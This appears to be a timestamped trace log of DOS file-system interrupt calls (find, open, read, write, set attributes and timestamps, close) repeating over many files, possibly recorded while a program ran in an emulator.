2018-12-25T12:45:14.801541264Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:14.804020156Z	67	PC: 12ac5 \| Get or set file attributes (See above)
2018-12-25T12:45:14.813971076Z	61	PC: 12ad3 \| Open file (See above)
2018-12-25T12:45:14.820332972Z	63	PC: 12ae1 \| Read file or device (See above)
2018-12-25T12:45:14.826439369Z	66	PC: 12af6 \| Move file pointer (See above)
2018-12-25T12:45:14.828236469Z	44	PC: 12b04 \| Get time (See above)
2018-12-25T12:45:14.8310264Z	64	PC: 12a78 \| Write file or device (See above)
2018-12-25T12:45:14.833688465Z	66	PC: 12b1e \| Move file pointer (See above)
2018-12-25T12:45:14.835577439Z	64	PC: 12b2b \| Write file or device (See above)
2018-12-25T12:45:14.837983923Z	67	PC: 12b39 \| Get or set file attributes (See above)
2018-12-25T12:45:14.842432462Z	87	PC: 12b48 \| Get or set file date and time (See above)
2018-12-25T12:45:14.845508153Z	62	PC: 12b4c \| Close file (See above)
2018-12-25T12:45:14.854919843Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:14.857726236Z	67	PC: 12ac5 \| Get or set file attributes (See above)
2018-12-25T12:45:14.867621531Z	61	PC: 12ad3 \| Open file (See above)
2018-12-25T12:45:14.874634238Z	63	PC: 12ae1 \| Read file or device (See above)
2018-12-25T12:45:14.881114812Z	66	PC: 12af6 \| Move file pointer (See above)
2018-12-25T12:45:14.882927223Z	44	PC: 12b04 \| Get time (See above)
2018-12-25T12:45:14.886002057Z	64	PC: 12a78 \| Write file or device (See above)
2018-12-25T12:45:14.888962669Z	66	PC: 12b1e \| Move file pointer (See above)
2018-12-25T12:45:14.890531109Z	64	PC: 12b2b \| Write file or device (See above)
2018-12-25T12:45:14.894346012Z	67	PC: 12b39 \| Get or set file attributes (See above)
2018-12-25T12:45:14.89901425Z	87	PC: 12b48 \| Get or set file date and time (See above)
2018-12-25T12:45:14.90074161Z	62	PC: 12b4c \| Close file (See above)
2018-12-25T12:45:14.909075029Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:14.912094484Z	67	PC: 12ac5 \| Get or set file attributes (See above)
2018-12-25T12:45:14.922146035Z	61	PC: 12ad3 \| Open file (See above)
2018-12-25T12:45:14.929606298Z	63	PC: 12ae1 \| Read file or device (See above)
2018-12-25T12:45:14.935883536Z	66	PC: 12af6 \| Move file pointer (See above)
2018-12-25T12:45:14.937698947Z	44	PC: 12b04 \| Get time (See above)
2018-12-25T12:45:14.941193829Z	64	PC: 12a78 \| Write file or device (See above)
2018-12-25T12:45:14.943975629Z	66	PC: 12b1e \| Move file pointer (See above)
2018-12-25T12:45:14.945343888Z	64	PC: 12b2b \| Write file or device (See above)
2018-12-25T12:45:14.948645255Z	67	PC: 12b39 \| Get or set file attributes (See above)
2018-12-25T12:45:14.953267292Z	87	PC: 12b48 \| Get or set file date and time (See above)
2018-12-25T12:45:14.954618671Z	62	PC: 12b4c \| Close file (See above)
2018-12-25T12:45:14.961733531Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:14.964678923Z	67	PC: 12ac5 \| Get or set file attributes (See above)
2018-12-25T12:45:14.974130658Z	61	PC: 12ad3 \| Open file (See above)
2018-12-25T12:45:14.985624724Z	63	PC: 12ae1 \| Read file or device (See above)
2018-12-25T12:45:14.992065068Z	66	PC: 12af6 \| Move file pointer (See above)
2018-12-25T12:45:14.993332824Z	44	PC: 12b04 \| Get time (See above)
2018-12-25T12:45:14.995450272Z	64	PC: 12a78 \| Write file or device (See above)
2018-12-25T12:45:15.004017984Z	66	PC: 12b1e \| Move file pointer (See above)
2018-12-25T12:45:15.005237757Z	64	PC: 12b2b \| Write file or device (See above)
2018-12-25T12:45:15.011594573Z	67	PC: 12b39 \| Get or set file attributes (See above)
2018-12-25T12:45:15.016711874Z	87	PC: 12b48 \| Get or set file date and time (See above)
2018-12-25T12:45:15.018059076Z	62	PC: 12b4c \| Close file (See above)
2018-12-25T12:45:15.025523167Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:15.028875482Z	67	PC: 12ac5 \| Get or set file attributes (See above)
2018-12-25T12:45:15.03832948Z	61	PC: 12ad3 \| Open file (See above)
2018-12-25T12:45:15.04477677Z	63	PC: 12ae1 \| Read file or device (See above)
2018-12-25T12:45:15.052504434Z	66	PC: 12af6 \| Move file pointer (See above)
2018-12-25T12:45:15.054119681Z	44	PC: 12b04 \| Get time (See above)
2018-12-25T12:45:15.056605366Z	64	PC: 12a78 \| Write file or device (See above)
2018-12-25T12:45:15.060356715Z	66	PC: 12b1e \| Move file pointer (See above)
2018-12-25T12:45:15.062305017Z	64	PC: 12b2b \| Write file or device (See above)
2018-12-25T12:45:15.065062757Z	67	PC: 12b39 \| Get or set file attributes (See above)
2018-12-25T12:45:15.070683838Z	87	PC: 12b48 \| Get or set file date and time (See above)
2018-12-25T12:45:15.072362998Z	62	PC: 12b4c \| Close file (See above)
2018-12-25T12:45:15.079854614Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:15.083134022Z	67	PC: 12ac5 \| Get or set file attributes (See above)
2018-12-25T12:45:15.092647707Z	61	PC: 12ad3 \| Open file (See above)
2018-12-25T12:45:15.099166042Z	63	PC: 12ae1 \| Read file or device (See above)
2018-12-25T12:45:15.1068424Z	67	PC: 12b39 \| Get or set file attributes (See above)
2018-12-25T12:45:15.116816554Z	87	PC: 12b48 \| Get or set file date and time (See above)
2018-12-25T12:45:15.118205274Z	62	PC: 12b4c \| Close file (See above)
2018-12-25T12:45:15.126009608Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:15.128961209Z	59	PC: 12b64 \| Change current directory
2018-12-25T12:45:15.1331808Z	59	PC: 12b70 \| Change current directory
2018-12-25T12:45:15.137304587Z	26	PC: 12b58 \| Set disk transfer address